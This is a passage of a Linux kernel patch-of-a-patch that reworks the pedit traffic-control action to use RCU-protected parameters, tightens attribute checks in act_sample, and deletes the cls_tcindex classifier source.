+-	p = to_pedit(*a);
+-	spin_lock_bh(&p->tcf_lock);
+ 
+-	if (ret == ACT_P_CREATED ||
+-	    (p->tcfp_nkeys && p->tcfp_nkeys != parm->nkeys)) {
+-		keys = kmalloc(ksize, GFP_ATOMIC);
+-		if (!keys) {
+-			spin_unlock_bh(&p->tcf_lock);
+-			ret = -ENOMEM;
+-			goto put_chain;
+-		}
+-		kfree(p->tcfp_keys);
+-		p->tcfp_keys = keys;
+-		p->tcfp_nkeys = parm->nkeys;
++	nparms->tcfp_off_max_hint = 0;
++	nparms->tcfp_flags = parm->flags;
++	nparms->tcfp_nkeys = parm->nkeys;
++
++	nparms->tcfp_keys = kmalloc(ksize, GFP_KERNEL);
++	if (!nparms->tcfp_keys) {
++		ret = -ENOMEM;
++		goto put_chain;
+ 	}
+-	memcpy(p->tcfp_keys, parm->keys, ksize);
+-	p->tcfp_off_max_hint = 0;
+-	for (i = 0; i < p->tcfp_nkeys; ++i) {
+-		u32 cur = p->tcfp_keys[i].off;
++
++	memcpy(nparms->tcfp_keys, parm->keys, ksize);
++
++	for (i = 0; i < nparms->tcfp_nkeys; ++i) {
++		u32 cur = nparms->tcfp_keys[i].off;
+ 
+ 		/* sanitize the shift value for any later use */
+-		p->tcfp_keys[i].shift = min_t(size_t, BITS_PER_TYPE(int) - 1,
+-					      p->tcfp_keys[i].shift);
++		nparms->tcfp_keys[i].shift = min_t(size_t,
++						   BITS_PER_TYPE(int) - 1,
++						   nparms->tcfp_keys[i].shift);
+ 
+ 		/* The AT option can read a single byte, we can bound the actual
+ 		 * value with uchar max.
+ 		 */
+-		cur += (0xff & p->tcfp_keys[i].offmask) >> p->tcfp_keys[i].shift;
++		cur += (0xff & nparms->tcfp_keys[i].offmask) >> nparms->tcfp_keys[i].shift;
+ 
+ 		/* Each key touches 4 bytes starting from the computed offset */
+-		p->tcfp_off_max_hint = max(p->tcfp_off_max_hint, cur + 4);
++		nparms->tcfp_off_max_hint =
++			max(nparms->tcfp_off_max_hint, cur + 4);
+ 	}
+ 
+-	p->tcfp_flags = parm->flags;
++	p = to_pedit(*a);
++
++	spin_lock_bh(&p->tcf_lock);
+ 	goto_ch = tcf_action_set_ctrlact(*a, parm->action, goto_ch);
++	oparms = rcu_replace_pointer(p->parms, nparms, 1);
++	spin_unlock_bh(&p->tcf_lock);
+ 
+-	kfree(p->tcfp_keys_ex);
+-	p->tcfp_keys_ex = keys_ex;
++	if (oparms)
++		call_rcu(&oparms->rcu, tcf_pedit_cleanup_rcu);
+ 
+-	spin_unlock_bh(&p->tcf_lock);
+ 	if (goto_ch)
+ 		tcf_chain_put_by_act(goto_ch);
++
+ 	return ret;
+ 
+ put_chain:
+ 	if (goto_ch)
+ 		tcf_chain_put_by_act(goto_ch);
++out_free_ex:
++	kfree(nparms->tcfp_keys_ex);
++out_free:
++	kfree(nparms);
+ out_release:
+ 	tcf_idr_release(*a, bind);
+-out_free:
+-	kfree(keys_ex);
+ 	return ret;
+-
+ }
+ 
+ static void tcf_pedit_cleanup(struct tc_action *a)
+ {
+ 	struct tcf_pedit *p = to_pedit(a);
+-	struct tc_pedit_key *keys = p->tcfp_keys;
++	struct tcf_pedit_parms *parms;
+ 
+-	kfree(keys);
+-	kfree(p->tcfp_keys_ex);
++	parms = rcu_dereference_protected(p->parms, 1);
++
++	if (parms)
++		call_rcu(&parms->rcu, tcf_pedit_cleanup_rcu);
+ }
+ 
+ static bool offset_valid(struct sk_buff *skb, int offset)
+@@ -325,28 +351,30 @@ TC_INDIRECT_SCOPE int tcf_pedit_act(struct sk_buff *skb,
+ 				    struct tcf_result *res)
+ {
+ 	struct tcf_pedit *p = to_pedit(a);
++	struct tcf_pedit_parms *parms;
+ 	u32 max_offset;
+ 	int i;
+ 
+-	spin_lock(&p->tcf_lock);
++	parms = rcu_dereference_bh(p->parms);
+ 
+ 	max_offset = (skb_transport_header_was_set(skb) ?
+ 		      skb_transport_offset(skb) :
+ 		      skb_network_offset(skb)) +
+-		     p->tcfp_off_max_hint;
++		     parms->tcfp_off_max_hint;
+ 	if (skb_ensure_writable(skb, min(skb->len, max_offset)))
+-		goto unlock;
++		goto done;
+ 
+ 	tcf_lastuse_update(&p->tcf_tm);
++	tcf_action_update_bstats(&p->common, skb);
+ 
+-	if (p->tcfp_nkeys > 0) {
+-		struct tc_pedit_key *tkey = p->tcfp_keys;
+-		struct tcf_pedit_key_ex *tkey_ex = p->tcfp_keys_ex;
++	if (parms->tcfp_nkeys > 0) {
++		struct tc_pedit_key *tkey = parms->tcfp_keys;
++		struct tcf_pedit_key_ex *tkey_ex = parms->tcfp_keys_ex;
+ 		enum pedit_header_type htype =
+ 			TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
+ 		enum pedit_cmd cmd = TCA_PEDIT_KEY_EX_CMD_SET;
+ 
+-		for (i = p->tcfp_nkeys; i > 0; i--, tkey++) {
++		for (i = parms->tcfp_nkeys; i > 0; i--, tkey++) {
+ 			u32 *ptr, hdata;
+ 			int offset = tkey->off;
+ 			int hoffset;
+@@ -422,11 +450,10 @@ TC_INDIRECT_SCOPE int tcf_pedit_act(struct sk_buff *skb,
+ 	}
+ 
+ bad:
++	spin_lock(&p->tcf_lock);
+ 	p->tcf_qstats.overlimits++;
+-done:
+-	bstats_update(&p->tcf_bstats, skb);
+-unlock:
+ 	spin_unlock(&p->tcf_lock);
++done:
+ 	return p->tcf_action;
+ }
+ 
+@@ -445,30 +472,33 @@ static int tcf_pedit_dump(struct sk_buff *skb, struct tc_action *a,
+ {
+ 	unsigned char *b = skb_tail_pointer(skb);
+ 	struct tcf_pedit *p = to_pedit(a);
++	struct tcf_pedit_parms *parms;
+ 	struct tc_pedit *opt;
+ 	struct tcf_t t;
+ 	int s;
+ 
+-	s = struct_size(opt, keys, p->tcfp_nkeys);
++	spin_lock_bh(&p->tcf_lock);
++	parms = rcu_dereference_protected(p->parms, 1);
++	s = struct_size(opt, keys, parms->tcfp_nkeys);
+ 
+-	/* netlink spinlocks held above us - must use ATOMIC */
+ 	opt = kzalloc(s, GFP_ATOMIC);
+-	if (unlikely(!opt))
++	if (unlikely(!opt)) {
++		spin_unlock_bh(&p->tcf_lock);
+ 		return -ENOBUFS;
++	}
+ 
+-	spin_lock_bh(&p->tcf_lock);
+-	memcpy(opt->keys, p->tcfp_keys, flex_array_size(opt, keys, p->tcfp_nkeys));
++	memcpy(opt->keys, parms->tcfp_keys,
++	       flex_array_size(opt, keys, parms->tcfp_nkeys));
+ 	opt->index = p->tcf_index;
+-	opt->nkeys = p->tcfp_nkeys;
+-	opt->flags = p->tcfp_flags;
++	opt->nkeys = parms->tcfp_nkeys;
++	opt->flags = parms->tcfp_flags;
+ 	opt->action = p->tcf_action;
+ 	opt->refcnt = refcount_read(&p->tcf_refcnt) - ref;
+ 	opt->bindcnt = atomic_read(&p->tcf_bindcnt) - bind;
+ 
+-	if (p->tcfp_keys_ex) {
+-		if (tcf_pedit_key_ex_dump(skb,
+-					  p->tcfp_keys_ex,
+-					  p->tcfp_nkeys))
++	if (parms->tcfp_keys_ex) {
++		if (tcf_pedit_key_ex_dump(skb, parms->tcfp_keys_ex,
++					  parms->tcfp_nkeys))
+ 			goto nla_put_failure;
+ 
+ 		if (nla_put(skb, TCA_PEDIT_PARMS_EX, s, opt))
+diff --git a/net/sched/act_sample.c b/net/sched/act_sample.c
+index f7416b5598e04..4c670e7568dc6 100644
+--- a/net/sched/act_sample.c
++++ b/net/sched/act_sample.c
+@@ -55,8 +55,8 @@ static int tcf_sample_init(struct net *net, struct nlattr *nla,
+ 					  sample_policy, NULL);
+ 	if (ret < 0)
+ 		return ret;
+-	if (!tb[TCA_SAMPLE_PARMS] || !tb[TCA_SAMPLE_RATE] ||
+-	    !tb[TCA_SAMPLE_PSAMPLE_GROUP])
++
++	if (!tb[TCA_SAMPLE_PARMS])
+ 		return -EINVAL;
+ 
+ 	parm = nla_data(tb[TCA_SAMPLE_PARMS]);
+@@ -80,6 +80,13 @@ static int tcf_sample_init(struct net *net, struct nlattr *nla,
+ 		tcf_idr_release(*a, bind);
+ 		return -EEXIST;
+ 	}
++
++	if (!tb[TCA_SAMPLE_RATE] || !tb[TCA_SAMPLE_PSAMPLE_GROUP]) {
++		NL_SET_ERR_MSG(extack, "sample rate and group are required");
++		err = -EINVAL;
++		goto release_idr;
++	}
++
+ 	err = tcf_action_check_ctrlact(parm->action, tp, &goto_ch, extack);
+ 	if (err < 0)
+ 		goto release_idr;
+diff --git a/net/sched/cls_tcindex.c b/net/sched/cls_tcindex.c
+deleted file mode 100644
+index 6640e75eaa02e..0000000000000
+--- a/net/sched/cls_tcindex.c
++++ /dev/null
+@@ -1,742 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-only
+-/*
+- * net/sched/cls_tcindex.c	Packet classifier for skb->tc_index
+- *
+- * Written 1998,1999 by Werner Almesberger, EPFL ICA
+- */
+-
+-#include <linux/module.h>
+-#include <linux/types.h>
+-#include <linux/kernel.h>
+-#include <linux/skbuff.h>
+-#include <linux/errno.h>
+-#include <linux/slab.h>
+-#include <linux/refcount.h>
+-#include <linux/rcupdate.h>
+-#include <net/act_api.h>
+-#include <net/netlink.h>
+-#include <net/pkt_cls.h>
+-#include <net/sch_generic.h>
+-#include <net/tc_wrapper.h>
+-
+-/*
+- * Passing parameters to the root seems to be done more awkwardly than really
+- * necessary. At least, u32 doesn't seem to use such dirty hacks. To be
+- * verified. FIXME.
+- */
+-
+-#define PERFECT_HASH_THRESHOLD	64	/* use perfect hash if not bigger */
+-#define DEFAULT_HASH_SIZE	64	/* optimized for diffserv */
+-
+-
+-struct tcindex_data;
+-
+-struct tcindex_filter_result {
+-	struct tcf_exts		exts;
+-	struct tcf_result	res;
+-	struct tcindex_data	*p;
+-	struct rcu_work		rwork;
+-};
+-
+-struct tcindex_filter {
+-	u16 key;
+-	struct tcindex_filter_result result;
+-	struct tcindex_filter __rcu *next;
+-	struct rcu_work rwork;
+-};
+-
+-
+-struct tcindex_data {
+-	struct tcindex_filter_result *perfect; /* perfect hash; NULL if none */
+-	struct tcindex_filter __rcu **h; /* imperfect hash; */
+-	struct tcf_proto *tp;
+-	u16 mask;		/* AND key with mask */
+-	u32 shift;		/* shift ANDed key to the right */
+-	u32 hash;		/* hash table size; 0 if undefined */
+-	u32 alloc_hash;		/* allocated size */
+-	u32 fall_through;	/* 0: only classify if explicit match */
+-	refcount_t refcnt;	/* a temporary refcnt for perfect hash */
+-	struct rcu_work rwork;
+-};
+-
+-static inline int tcindex_filter_is_set(struct tcindex_filter_result *r)
+-{
+-	return tcf_exts_has_actions(&r->exts) || r->res.classid;
+-}
+-
+-static void tcindex_data_get(struct tcindex_data *p)
+-{
+-	refcount_inc(&p->refcnt);
+-}
+-
+-static void tcindex_data_put(struct tcindex_data *p)
+-{
+-	if (refcount_dec_and_test(&p->refcnt)) {
+-		kfree(p->perfect);
+-		kfree(p->h);
+-		kfree(p);
+-	}
+-}
+-
+-static struct tcindex_filter_result *tcindex_lookup(struct tcindex_data *p,
+-						    u16 key)
+-{
+-	if (p->perfect) {
+-		struct tcindex_filter_result *f = p->perfect + key;
+-
+-		return tcindex_filter_is_set(f) ? f : NULL;
+-	} else if (p->h) {
+-		struct tcindex_filter __rcu **fp;
+-		struct tcindex_filter *f;
+-
+-		fp = &p->h[key % p->hash];
+-		for (f = rcu_dereference_bh_rtnl(*fp);
+-		     f;
+-		     fp = &f->next, f = rcu_dereference_bh_rtnl(*fp))
+-			if (f->key == key)
+-				return &f->result;
+-	}
+-
+-	return NULL;
+-}
+-
+-TC_INDIRECT_SCOPE int tcindex_classify(struct sk_buff *skb,
+-				       const struct tcf_proto *tp,
+-				       struct tcf_result *res)
+-{
+-	struct tcindex_data *p = rcu_dereference_bh(tp->root);
+-	struct tcindex_filter_result *f;
+-	int key = (skb->tc_index & p->mask) >> p->shift;
+-
+-	pr_debug("tcindex_classify(skb %p,tp %p,res %p),p %p\n",
+-		 skb, tp, res, p);
+-
+-	f = tcindex_lookup(p, key);
+-	if (!f) {
+-		struct Qdisc *q = tcf_block_q(tp->chain->block);
+-
+-		if (!p->fall_through)
+-			return -1;
+-		res->classid = TC_H_MAKE(TC_H_MAJ(q->handle), key);
+-		res->class = 0;
+-		pr_debug("alg 0x%x\n", res->classid);
+-		return 0;
+-	}
+-	*res = f->res;
+-	pr_debug("map 0x%x\n", res->classid);
+-
+-	return tcf_exts_exec(skb, &f->exts, res);
+-}
+-
+-
+-static void *tcindex_get(struct tcf_proto *tp, u32 handle)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter_result *r;
+-
+-	pr_debug("tcindex_get(tp %p,handle 0x%08x)\n", tp, handle);
+-	if (p->perfect && handle >= p->alloc_hash)
+-		return NULL;
+-	r = tcindex_lookup(p, handle);
+-	return r && tcindex_filter_is_set(r) ? r : NULL;
+-}
+-
+-static int tcindex_init(struct tcf_proto *tp)
+-{
+-	struct tcindex_data *p;
+-
+-	pr_debug("tcindex_init(tp %p)\n", tp);
+-	p = kzalloc(sizeof(struct tcindex_data), GFP_KERNEL);
+-	if (!p)
+-		return -ENOMEM;
+-
+-	p->mask = 0xffff;
+-	p->hash = DEFAULT_HASH_SIZE;
+-	p->fall_through = 1;
+-	refcount_set(&p->refcnt, 1); /* Paired with tcindex_destroy_work() */
+-
+-	rcu_assign_pointer(tp->root, p);
+-	return 0;
+-}
+-
+-static void __tcindex_destroy_rexts(struct tcindex_filter_result *r)
+-{
+-	tcf_exts_destroy(&r->exts);
+-	tcf_exts_put_net(&r->exts);
+-	tcindex_data_put(r->p);
+-}
+-
+-static void tcindex_destroy_rexts_work(struct work_struct *work)
+-{
+-	struct tcindex_filter_result *r;
+-
+-	r = container_of(to_rcu_work(work),
+-			 struct tcindex_filter_result,
+-			 rwork);
+-	rtnl_lock();
+-	__tcindex_destroy_rexts(r);
+-	rtnl_unlock();
+-}
+-
+-static void __tcindex_destroy_fexts(struct tcindex_filter *f)
+-{
+-	tcf_exts_destroy(&f->result.exts);
+-	tcf_exts_put_net(&f->result.exts);
+-	kfree(f);
+-}
+-
+-static void tcindex_destroy_fexts_work(struct work_struct *work)
+-{
+-	struct tcindex_filter *f = container_of(to_rcu_work(work),
+-						struct tcindex_filter,
+-						rwork);
+-
+-	rtnl_lock();
+-	__tcindex_destroy_fexts(f);
+-	rtnl_unlock();
+-}
+-
+-static int tcindex_delete(struct tcf_proto *tp, void *arg, bool *last,
+-			  bool rtnl_held, struct netlink_ext_ack *extack)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter_result *r = arg;
+-	struct tcindex_filter __rcu **walk;
+-	struct tcindex_filter *f = NULL;
+-
+-	pr_debug("tcindex_delete(tp %p,arg %p),p %p\n", tp, arg, p);
+-	if (p->perfect) {
+-		if (!r->res.class)
+-			return -ENOENT;
+-	} else {
+-		int i;
+-
+-		for (i = 0; i < p->hash; i++) {
+-			walk = p->h + i;
+-			for (f = rtnl_dereference(*walk); f;
+-			     walk = &f->next, f = rtnl_dereference(*walk)) {
+-				if (&f->result == r)
+-					goto found;
+-			}
+-		}
+-		return -ENOENT;
+-
+-found:
+-		rcu_assign_pointer(*walk, rtnl_dereference(f->next));
+-	}
+-	tcf_unbind_filter(tp, &r->res);
+-	/* all classifiers are required to call tcf_exts_destroy() after rcu
+-	 * grace period, since converted-to-rcu actions are relying on that
+-	 * in cleanup() callback
+-	 */
+-	if (f) {
+-		if (tcf_exts_get_net(&f->result.exts))
+-			tcf_queue_work(&f->rwork, tcindex_destroy_fexts_work);
+-		else
+-			__tcindex_destroy_fexts(f);
+-	} else {
+-		tcindex_data_get(p);
+-
+-		if (tcf_exts_get_net(&r->exts))
+-			tcf_queue_work(&r->rwork, tcindex_destroy_rexts_work);
+-		else
+-			__tcindex_destroy_rexts(r);
+-	}
+-
+-	*last = false;
+-	return 0;
+-}
+-
+-static void tcindex_destroy_work(struct work_struct *work)
+-{
+-	struct tcindex_data *p = container_of(to_rcu_work(work),
+-					      struct tcindex_data,
+-					      rwork);
+-
+-	tcindex_data_put(p);
+-}
+-
+-static inline int
+-valid_perfect_hash(struct tcindex_data *p)
+-{
+-	return  p->hash > (p->mask >> p->shift);
+-}
+-
+-static const struct nla_policy tcindex_policy[TCA_TCINDEX_MAX + 1] = {
+-	[TCA_TCINDEX_HASH]		= { .type = NLA_U32 },
+-	[TCA_TCINDEX_MASK]		= { .type = NLA_U16 },
+-	[TCA_TCINDEX_SHIFT]		= { .type = NLA_U32 },
+-	[TCA_TCINDEX_FALL_THROUGH]	= { .type = NLA_U32 },
+-	[TCA_TCINDEX_CLASSID]		= { .type = NLA_U32 },
+-};
+-
+-static int tcindex_filter_result_init(struct tcindex_filter_result *r,
+-				      struct tcindex_data *p,
+-				      struct net *net)
+-{
+-	memset(r, 0, sizeof(*r));
+-	r->p = p;
+-	return tcf_exts_init(&r->exts, net, TCA_TCINDEX_ACT,
+-			     TCA_TCINDEX_POLICE);
+-}
+-
+-static void tcindex_free_perfect_hash(struct tcindex_data *cp);
+-
+-static void tcindex_partial_destroy_work(struct work_struct *work)
+-{
+-	struct tcindex_data *p = container_of(to_rcu_work(work),
+-					      struct tcindex_data,
+-					      rwork);
+-
+-	rtnl_lock();
+-	if (p->perfect)
+-		tcindex_free_perfect_hash(p);
+-	kfree(p);
+-	rtnl_unlock();
+-}
+-
+-static void tcindex_free_perfect_hash(struct tcindex_data *cp)
+-{
+-	int i;
+-
+-	for (i = 0; i < cp->hash; i++)
+-		tcf_exts_destroy(&cp->perfect[i].exts);
+-	kfree(cp->perfect);
+-}
+-
+-static int tcindex_alloc_perfect_hash(struct net *net, struct tcindex_data *cp)
+-{
+-	int i, err = 0;
+-
+-	cp->perfect = kcalloc(cp->hash, sizeof(struct tcindex_filter_result),
+-			      GFP_KERNEL | __GFP_NOWARN);
+-	if (!cp->perfect)
+-		return -ENOMEM;
+-
+-	for (i = 0; i < cp->hash; i++) {
+-		err = tcf_exts_init(&cp->perfect[i].exts, net,
+-				    TCA_TCINDEX_ACT, TCA_TCINDEX_POLICE);
+-		if (err < 0)
+-			goto errout;
+-		cp->perfect[i].p = cp;
+-	}
+-
+-	return 0;
+-
+-errout:
+-	tcindex_free_perfect_hash(cp);
+-	return err;
+-}
+-
+-static int
+-tcindex_set_parms(struct net *net, struct tcf_proto *tp, unsigned long base,
+-		  u32 handle, struct tcindex_data *p,
+-		  struct tcindex_filter_result *r, struct nlattr **tb,
+-		  struct nlattr *est, u32 flags, struct netlink_ext_ack *extack)
+-{
+-	struct tcindex_filter_result new_filter_result;
+-	struct tcindex_data *cp = NULL, *oldp;
+-	struct tcindex_filter *f = NULL; /* make gcc behave */
+-	struct tcf_result cr = {};
+-	int err, balloc = 0;
+-	struct tcf_exts e;
+-	bool update_h = false;
+-
+-	err = tcf_exts_init(&e, net, TCA_TCINDEX_ACT, TCA_TCINDEX_POLICE);
+-	if (err < 0)
+-		return err;
+-	err = tcf_exts_validate(net, tp, tb, est, &e, flags, extack);
+-	if (err < 0)
+-		goto errout;
+-
+-	err = -ENOMEM;
+-	/* tcindex_data attributes must look atomic to classifier/lookup so
+-	 * allocate new tcindex data and RCU assign it onto root. Keeping
+-	 * perfect hash and hash pointers from old data.
+-	 */
+-	cp = kzalloc(sizeof(*cp), GFP_KERNEL);
+-	if (!cp)
+-		goto errout;
+-
+-	cp->mask = p->mask;
+-	cp->shift = p->shift;
+-	cp->hash = p->hash;
+-	cp->alloc_hash = p->alloc_hash;
+-	cp->fall_through = p->fall_through;
+-	cp->tp = tp;
+-	refcount_set(&cp->refcnt, 1); /* Paired with tcindex_destroy_work() */
+-
+-	if (tb[TCA_TCINDEX_HASH])
+-		cp->hash = nla_get_u32(tb[TCA_TCINDEX_HASH]);
+-
+-	if (tb[TCA_TCINDEX_MASK])
+-		cp->mask = nla_get_u16(tb[TCA_TCINDEX_MASK]);
+-
+-	if (tb[TCA_TCINDEX_SHIFT]) {
+-		cp->shift = nla_get_u32(tb[TCA_TCINDEX_SHIFT]);
+-		if (cp->shift > 16) {
+-			err = -EINVAL;
+-			goto errout;
+-		}
+-	}
+-	if (!cp->hash) {
+-		/* Hash not specified, use perfect hash if the upper limit
+-		 * of the hashing index is below the threshold.
+-		 */
+-		if ((cp->mask >> cp->shift) < PERFECT_HASH_THRESHOLD)
+-			cp->hash = (cp->mask >> cp->shift) + 1;
+-		else
+-			cp->hash = DEFAULT_HASH_SIZE;
+-	}
+-
+-	if (p->perfect) {
+-		int i;
+-
+-		if (tcindex_alloc_perfect_hash(net, cp) < 0)
+-			goto errout;
+-		cp->alloc_hash = cp->hash;
+-		for (i = 0; i < min(cp->hash, p->hash); i++)
+-			cp->perfect[i].res = p->perfect[i].res;
+-		balloc = 1;
+-	}
+-	cp->h = p->h;
+-
+-	err = tcindex_filter_result_init(&new_filter_result, cp, net);
+-	if (err < 0)
+-		goto errout_alloc;
+-	if (r)
+-		cr = r->res;
+-
+-	err = -EBUSY;
+-
+-	/* Hash already allocated, make sure that we still meet the
+-	 * requirements for the allocated hash.
+-	 */
+-	if (cp->perfect) {
+-		if (!valid_perfect_hash(cp) ||
+-		    cp->hash > cp->alloc_hash)
+-			goto errout_alloc;
+-	} else if (cp->h && cp->hash != cp->alloc_hash) {
+-		goto errout_alloc;
+-	}
+-
+-	err = -EINVAL;
+-	if (tb[TCA_TCINDEX_FALL_THROUGH])
+-		cp->fall_through = nla_get_u32(tb[TCA_TCINDEX_FALL_THROUGH]);
+-
+-	if (!cp->perfect && !cp->h)
+-		cp->alloc_hash = cp->hash;
+-
+-	/* Note: this could be as restrictive as if (handle & ~(mask >> shift))
+-	 * but then, we'd fail handles that may become valid after some future
+-	 * mask change. While this is extremely unlikely to ever matter,
+-	 * the check below is safer (and also more backwards-compatible).
+-	 */
+-	if (cp->perfect || valid_perfect_hash(cp))
+-		if (handle >= cp->alloc_hash)
+-			goto errout_alloc;
+-
+-
+-	err = -ENOMEM;
+-	if (!cp->perfect && !cp->h) {
+-		if (valid_perfect_hash(cp)) {
+-			if (tcindex_alloc_perfect_hash(net, cp) < 0)
+-				goto errout_alloc;
+-			balloc = 1;
+-		} else {
+-			struct tcindex_filter __rcu **hash;
+-
+-			hash = kcalloc(cp->hash,
+-				       sizeof(struct tcindex_filter *),
+-				       GFP_KERNEL);
+-
+-			if (!hash)
+-				goto errout_alloc;
+-
+-			cp->h = hash;
+-			balloc = 2;
+-		}
+-	}
+-
+-	if (cp->perfect) {
+-		r = cp->perfect + handle;
+-	} else {
+-		/* imperfect area is updated in-place using rcu */
+-		update_h = !!tcindex_lookup(cp, handle);
+-		r = &new_filter_result;
+-	}
+-
+-	if (r == &new_filter_result) {
+-		f = kzalloc(sizeof(*f), GFP_KERNEL);
+-		if (!f)
+-			goto errout_alloc;
+-		f->key = handle;
+-		f->next = NULL;
+-		err = tcindex_filter_result_init(&f->result, cp, net);
+-		if (err < 0) {
+-			kfree(f);
+-			goto errout_alloc;
+-		}
+-	}
+-
+-	if (tb[TCA_TCINDEX_CLASSID]) {
+-		cr.classid = nla_get_u32(tb[TCA_TCINDEX_CLASSID]);
+-		tcf_bind_filter(tp, &cr, base);
+-	}
+-
+-	oldp = p;
+-	r->res = cr;
+-	tcf_exts_change(&r->exts, &e);
+-
+-	rcu_assign_pointer(tp->root, cp);
+-
+-	if (update_h) {
+-		struct tcindex_filter __rcu **fp;
+-		struct tcindex_filter *cf;
+-
+-		f->result.res = r->res;
+-		tcf_exts_change(&f->result.exts, &r->exts);
+-
+-		/* imperfect area bucket */
+-		fp = cp->h + (handle % cp->hash);
+-
+-		/* lookup the filter, guaranteed to exist */
+-		for (cf = rcu_dereference_bh_rtnl(*fp); cf;
+-		     fp = &cf->next, cf = rcu_dereference_bh_rtnl(*fp))
+-			if (cf->key == (u16)handle)
+-				break;
+-
+-		f->next = cf->next;
+-
+-		cf = rcu_replace_pointer(*fp, f, 1);
+-		tcf_exts_get_net(&cf->result.exts);
+-		tcf_queue_work(&cf->rwork, tcindex_destroy_fexts_work);
+-	} else if (r == &new_filter_result) {
+-		struct tcindex_filter *nfp;
+-		struct tcindex_filter __rcu **fp;
+-
+-		f->result.res = r->res;
+-		tcf_exts_change(&f->result.exts, &r->exts);
+-
+-		fp = cp->h + (handle % cp->hash);
+-		for (nfp = rtnl_dereference(*fp);
+-		     nfp;
+-		     fp = &nfp->next, nfp = rtnl_dereference(*fp))
+-				; /* nothing */
+-
+-		rcu_assign_pointer(*fp, f);
+-	} else {
+-		tcf_exts_destroy(&new_filter_result.exts);
+-	}
+-
+-	if (oldp)
+-		tcf_queue_work(&oldp->rwork, tcindex_partial_destroy_work);
+-	return 0;
+-
+-errout_alloc:
+-	if (balloc == 1)
+-		tcindex_free_perfect_hash(cp);
+-	else if (balloc == 2)
+-		kfree(cp->h);
+-	tcf_exts_destroy(&new_filter_result.exts);
+-errout:
+-	kfree(cp);
+-	tcf_exts_destroy(&e);
+-	return err;
+-}
+-
+-static int
+-tcindex_change(struct net *net, struct sk_buff *in_skb,
+-	       struct tcf_proto *tp, unsigned long base, u32 handle,
+-	       struct nlattr **tca, void **arg, u32 flags,
+-	       struct netlink_ext_ack *extack)
+-{
+-	struct nlattr *opt = tca[TCA_OPTIONS];
+-	struct nlattr *tb[TCA_TCINDEX_MAX + 1];
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter_result *r = *arg;
+-	int err;
+-
+-	pr_debug("tcindex_change(tp %p,handle 0x%08x,tca %p,arg %p),opt %p,"
+-	    "p %p,r %p,*arg %p\n",
+-	    tp, handle, tca, arg, opt, p, r, *arg);
+-
+-	if (!opt)
+-		return 0;
+-
+-	err = nla_parse_nested_deprecated(tb, TCA_TCINDEX_MAX, opt,
+-					  tcindex_policy, NULL);
+-	if (err < 0)
+-		return err;
+-
+-	return tcindex_set_parms(net, tp, base, handle, p, r, tb,
+-				 tca[TCA_RATE], flags, extack);
+-}
+-
+-static void tcindex_walk(struct tcf_proto *tp, struct tcf_walker *walker,
+-			 bool rtnl_held)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter *f, *next;
+-	int i;
+-
+-	pr_debug("tcindex_walk(tp %p,walker %p),p %p\n", tp, walker, p);
+-	if (p->perfect) {
+-		for (i = 0; i < p->hash; i++) {
+-			if (!p->perfect[i].res.class)
+-				continue;
+-			if (!tc_cls_stats_dump(tp, walker, p->perfect + i))
+-				return;
+-		}
+-	}
+-	if (!p->h)
+-		return;
+-	for (i = 0; i < p->hash; i++) {
+-		for (f = rtnl_dereference(p->h[i]); f; f = next) {
+-			next = rtnl_dereference(f->next);
+-			if (!tc_cls_stats_dump(tp, walker, &f->result))
+-				return;
+-		}
+-	}
+-}
+-
+-static void tcindex_destroy(struct tcf_proto *tp, bool rtnl_held,
+-			    struct netlink_ext_ack *extack)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	int i;
+-
+-	pr_debug("tcindex_destroy(tp %p),p %p\n", tp, p);
+-
+-	if (p->perfect) {
+-		for (i = 0; i < p->hash; i++) {
+-			struct tcindex_filter_result *r = p->perfect + i;
+-
+-			/* tcf_queue_work() does not guarantee the ordering we
+-			 * want, so we have to take this refcnt temporarily to
+-			 * ensure 'p' is freed after all tcindex_filter_result
+-			 * here. Imperfect hash does not need this, because it
+-			 * uses linked lists rather than an array.
+-			 */
+-			tcindex_data_get(p);
+-
+-			tcf_unbind_filter(tp, &r->res);
+-			if (tcf_exts_get_net(&r->exts))
+-				tcf_queue_work(&r->rwork,
+-					       tcindex_destroy_rexts_work);
+-			else
+-				__tcindex_destroy_rexts(r);
+-		}
+-	}
+-
+-	for (i = 0; p->h && i < p->hash; i++) {
+-		struct tcindex_filter *f, *next;
+-		bool last;
+-
+-		for (f = rtnl_dereference(p->h[i]); f; f = next) {
+-			next = rtnl_dereference(f->next);
+-			tcindex_delete(tp, &f->result, &last, rtnl_held, NULL);
+-		}
+-	}
+-
+-	tcf_queue_work(&p->rwork, tcindex_destroy_work);
+-}
+-
+-
+-static int tcindex_dump(struct net *net, struct tcf_proto *tp, void *fh,
+-			struct sk_buff *skb, struct tcmsg *t, bool rtnl_held)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter_result *r = fh;
+-	struct nlattr *nest;
+-
+-	pr_debug("tcindex_dump(tp %p,fh %p,skb %p,t %p),p %p,r %p\n",
+-		 tp, fh, skb, t, p, r);
+-	pr_debug("p->perfect %p p->h %p\n", p->perfect, p->h);
+-
+-	nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
+-	if (nest == NULL)
+-		goto nla_put_failure;
+-
+-	if (!fh) {
+-		t->tcm_handle = ~0; /* whatever ... */
+-		if (nla_put_u32(skb, TCA_TCINDEX_HASH, p->hash) ||
+-		    nla_put_u16(skb, TCA_TCINDEX_MASK, p->mask) ||
+-		    nla_put_u32(skb, TCA_TCINDEX_SHIFT, p->shift) ||
+-		    nla_put_u32(skb, TCA_TCINDEX_FALL_THROUGH, p->fall_through))
+-			goto nla_put_failure;
+-		nla_nest_end(skb, nest);
+-	} else {
+-		if (p->perfect) {
+-			t->tcm_handle = r - p->perfect;
+-		} else {
+-			struct tcindex_filter *f;
+-			struct tcindex_filter __rcu **fp;
+-			int i;
+-
+-			t->tcm_handle = 0;
+-			for (i = 0; !t->tcm_handle && i < p->hash; i++) {
+-				fp = &p->h[i];
+-				for (f = rtnl_dereference(*fp);
+-				     !t->tcm_handle && f;
+-				     fp = &f->next, f = rtnl_dereference(*fp)) {
+-					if (&f->result == r)
+-						t->tcm_handle = f->key;
+-				}
